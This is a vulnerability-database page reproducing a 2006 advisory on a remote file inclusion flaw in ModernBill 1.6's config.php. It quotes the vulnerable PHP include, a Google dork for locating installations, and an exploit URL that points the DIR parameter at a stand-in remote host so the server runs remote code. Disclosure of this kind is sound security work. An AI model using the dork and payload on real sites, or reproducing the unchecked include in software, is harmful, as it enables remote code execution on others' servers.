Lucene search
+L

ModernBill 1.6 - 'config.php' Remote File Inclusion

🗓️ 07 Aug 2006 00:00:00Reported by SolpotType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 62 Views

ModernBill 1.6 'config.php' Remote File Inclusion vulnerability found by SolpotCre

Related
Code
ReporterTitlePublishedViews
Family
Check Point Advisories
Modernbill config.php DIR Parameter PHP Code Execution - Ver2 (CVE-2006-4034)
7 Jan 201400:00
checkpoint_advisories
Check Point Advisories
Modernbill config.php DIR Parameter PHP Code Execution - Ver2 (CVE-2006-4034)
28 Jan 201400:00
checkpoint_advisories
CVE
CVE-2006-4034
9 Aug 200622:00
cve
Cvelist
CVE-2006-4034
9 Aug 200622:00
cvelist
EUVD
EUVD-2006-4027
7 Oct 202500:30
euvd
NVD
CVE-2006-4034
9 Aug 200622:04
nvd
Prion
Remote file inclusion
13 Nov 200811:30
prion
#############################SolpotCrew Community################################
#
# modernbill ver 1.6 (DIR) Remote File Inclusion
#
# Download file : http://freshmeat.net/projects/modernbill/
#
#################################################################################
#
#
# Bug Found By :Solpot a.k.a (k. Hasibuan) (03-08-2006)
#
# contact: [email protected]
#
# Website : http://www.solpotcrew.org/adv/solpot-adv-04.txt
#
################################################################################
#
#
# Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja ,
# L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy
# home_edition2001 , Rendy ,Tje , m3lky , no-profile , bYu
# and all crew #mardongan @ irc.dal.net
#
#
###############################################################################
Input passed to the "DIR" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from include/html/config.php

//include($DIR."include/misc/mod_sessions/session_functions.inc.php");
#session_set_save_handler("sess_mysql_open","","sess_mysql_read","sess_mysql_write","sess_mysql_destroy","sess_mysql_gc");
//session_start();
session_register("set_language");
session_register("v");
$new_language = ($set_language) ? $set_language : NULL ;
$signup_form = TRUE;
include_once($DIR."include/functions.inc.php");
## ------------------------------------------------------
## DO NOT CHANGE STOP
## ------------------------------------------------------

google dork : allinurl:/modernbill/

exploit: http://somehost/modernbill/include/html/config.php?DIR=http://evilcode

##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################

# milw0rm.com [2006-08-07]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Aug 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02562
62